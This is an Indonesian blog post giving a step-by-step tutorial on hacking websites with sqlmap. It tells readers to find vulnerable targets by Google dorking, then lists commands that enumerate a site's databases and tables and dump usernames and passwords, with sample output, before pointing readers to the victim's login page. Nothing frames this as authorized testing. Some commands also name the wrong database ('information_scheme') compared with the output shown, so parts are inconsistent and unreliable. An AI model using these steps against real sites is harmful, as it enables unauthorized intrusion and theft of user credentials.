Hello!

здравствуйте

это мой

Ahdeen

адин

Saturday, 7 January 2017

cara Hack Website dengan Sqlmap

Halo google ..... hari ini kita akan membahas tentang cara meretas situs web menggunakan sqlmap


Baiklah, mari kita mulai ...


pertama ... jika Anda menggunakan kali linux, sqlmap telah diinstal.


Sekarang buka terminal Anda


1. Anda harus menemukan target Anda dengan menggunakan google dork.

2. Jika Anda memiliki target Anda sendiri tanpa menggunakan google dork Anda juga dapat memindai kerentanan target Anda dengan menggunakan uniscan atau w3af


3. Baiklah setelah Anda memiliki target kemudian buka sqlmap di terminal


4. ketik sqlmap -u http://www.target.com/phd?id=2 --dbs


5. jika Anda berhasil, Anda akan melihat ini

[INFO] retrieved: information_schema
[INFO] retrieved: sqldummywebsite



6. Kemudian ketik sqlmap -u http://www.target.com/phd?id=2 -D information_scheme --tables


7. Anda akan melihat ini

[10:56:22] [INFO] heuristics detected web page charset
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info



8. Allright type Kemudian ketik sqlmap -u http://www.target.com/phd?id=2 -D information_scheme -T user_info --columns


9. Tampilannya seperti ini


[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)



10. then type sqlmap -u http://www.target.com/phd?id=2 -D information_scheme -T user_info -C user_id,user_login,user_password --dump


11. Taraaa Done ..... Selanjutnya pekerjaan Anda masih belum selesai ,, Anda harus menemukan halaman login target.


12. Ok sampai jumpa di postingan selanjutnya

Saya memiliki pengalaman yang memadai dalam sistem keamanan & keamanan internet. Juga saya seorang penulis untuk teknologi dan lainnya. Saya juga suka belajar bahasa baru. Jangan ragu untuk menghubungi saya dan kirim email dengan ide proyek Anda.

0 comments:

Post a Comment

Hubungi Aku

Alamat

Kalimantan street, City of Jember Indonesia

Nomor Telepon

+62 8233-4863-080

Email

ahdeen@bk.ru